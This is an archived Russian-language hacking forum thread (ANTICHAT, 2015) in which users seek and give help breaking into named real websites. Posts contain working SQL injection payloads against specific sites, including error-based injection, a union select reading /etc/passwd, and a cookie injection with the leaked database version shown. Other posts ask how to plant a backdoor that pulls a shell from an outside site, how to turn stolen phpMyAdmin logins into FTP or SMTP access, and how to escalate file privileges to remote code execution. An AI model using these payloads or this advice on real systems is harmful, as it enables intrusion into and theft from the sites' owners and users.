ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
14.10.2015, 20:03
|
|
Guest
Сообщений: n/a
Провел на форуме:
11344
Репутация:
5
|
|
Сообщение от dexspace
dexspace said:
↑
http://www.veles.km.ua/
'"
выдаёт
Код:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1
query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and deps.dep_up='0' and mf.system='1' limit 0,1' at line 1
query=select mf.id,mf.file from module_files mf inner join deps on (deps.file=mf.id) where deps.link=''"' and deps.dep_up='0' and mf.system='1' limit 0,1;You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"' and ison='1' and visible='1' limit 0,1' at line 1
query=select id from deps where link=''"' and ison='1' and visible='1' limit 0,1;
сайт уязвим, но havij не может выдрать имя базы.
сейчас сканю sqlmap
есть идеи? Руки рулят
Код:
Code:
http://www.veles.km.ua/' and (select 1 from (Select count(*),Concat((select version()),0x3a,floor(rand(0)*2))y from information_schema.tables group by y) x) --+
|
|
|
|
15.10.2015, 23:08
|
|
Guest
Сообщений: n/a
Провел на форуме:
0
Репутация:
0
|
|
Есть много phpmyadmin/ - разных версий. Уже с логинами и паролями. Движек Wordpres
Вопрос:
1 - Есть ли возможность - создать из phpmyadmin SMTP сервер
2 - Можно ли как сделать фтп или узнать данные фтп из phpmyadmin/
Спасибо.
|
|
|
|
15.10.2015, 23:43
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
Сообщение от Kirza
Kirza said:
↑
Есть много phpmyadmin/ - разных версий. Уже с логинами и паролями. Движек Wordpres
Вопрос:
1 - Есть ли возможность - создать из phpmyadmin SMTP сервер
2 - Можно ли как сделать фтп или узнать данные фтп из phpmyadmin/
Спасибо. 1. Если file_priv, то можно постепенно поднимать права до RCE, а там уже делать, что хочется.
2. Только путем чтения конфигов ( https://rdot.org/forum/showthread.php?t=741) или вариант выше
|
|
|
15.10.2015, 23:52
|
|
Guest
Сообщений: n/a
Провел на форуме:
6313
Репутация:
0
|
|
Доброе время суток.
Я конечно повторяюсь, но потерял тему с этим вопросом.
Как пробэкдорить сайт, чтобы после обращения к скрипту - шелл загружался с левого сайта в определенную папку?
|
|
|
|
16.10.2015, 00:44
|
|
Banned
Регистрация: 21.11.2007
Сообщений: 181
Провел на форуме:
1066435
Репутация:
1013
|
|
|
|
|
|
16.10.2015, 00:51
|
|
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875
Репутация:
137
|
|
Сообщение от -0x00-
-0x00- said:
↑
Доброе время суток.
Я конечно повторяюсь, но потерял тему с этим вопросом.
Как пробэкдорить сайт, чтобы после обращения к скрипту - шелл загружался с левого сайта в определенную папку? Вы наверное про эту тему? /threads/307894/ - Не стандартные способы заливки шеллов
|
|
|
|
16.10.2015, 02:48
|
|
Guest
Сообщений: n/a
Провел на форуме:
4566
Репутация:
7
|
|
Есть доступ к mongodb вроде 2.4 , возможно как-то получить доступ к файлам сайта или залить шел ?
Подключаюсь через Robomongo
|
|
|
|
16.10.2015, 13:27
|
|
Guest
Сообщений: n/a
Провел на форуме:
12627
Репутация:
0
|
|
Доброго времени суток
Помогите пожалуйста - пытаюсь изучать различного рода уязвимости - не для баловства, и порчи имущества, а для общего развития
на примере уязвимости:
Код:
Code:
http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file(%27/etc/passwd%27),3,4--
каким образом можно раскрыть абсолютный путь сайта ?
к примеру все файлы из etc читаются.
а как перейти к файлу httpd.conf
или каким другим образом из подобного запроса можно раскрыть абсолютный путь к сайту ?
большое спасибо |
|
|
|
16.10.2015, 14:33
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от aldemko
aldemko said:
↑
Доброго времени суток
Помогите пожалуйста - пытаюсь изучать различного рода уязвимости - не для баловства, и порчи имущества, а для общего развития
на примере уязвимости:
Код:
Code:
http://www.direct-line.ru/news_win.php?id=-2170%20union%20select%201,load_file(%27/etc/passwd%27),3,4--
каким образом можно раскрыть абсолютный путь сайта ?
к примеру все файлы из etc читаются.
а как перейти к файлу httpd.conf
или каким другим образом из подобного запроса можно раскрыть абсолютный путь к сайту ?
большое спасибо Изучи данный материал в помощь.
Так же там mysql root узнать пути с ссылкой выше не проблема, и залиться тоже.
|
|
|
|
16.10.2015, 15:15
|
|
Guest
Сообщений: n/a
Провел на форуме:
290351
Репутация:
173
|
|
Сообщение от RedFern.89
RedFern.89 said:
↑
Код:
Code:
http://prodota.ru/news/
Cookie: __cfduid=dd4763d374e8cfb5cbdfd45ca7737dd151443527442; session_id=1;
уязвим параметр session_id, дальше базы дело не идет? инъекция time based, поможет кто? Что значит дальше базы дело не идёт? легко крутится через error based
Cookie: __cfduid=dd4763d374e8cfb5cbdfd45ca7737dd1514435274 42; session_id=1'or(select*from(select(name_const(vers ion(),1)),name_const(version(),1))a)and(1)='1
Код:
Code:
Ошибка базы данных. MySQL пишет:Duplicate column name '5.6.25-73.1-log'
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
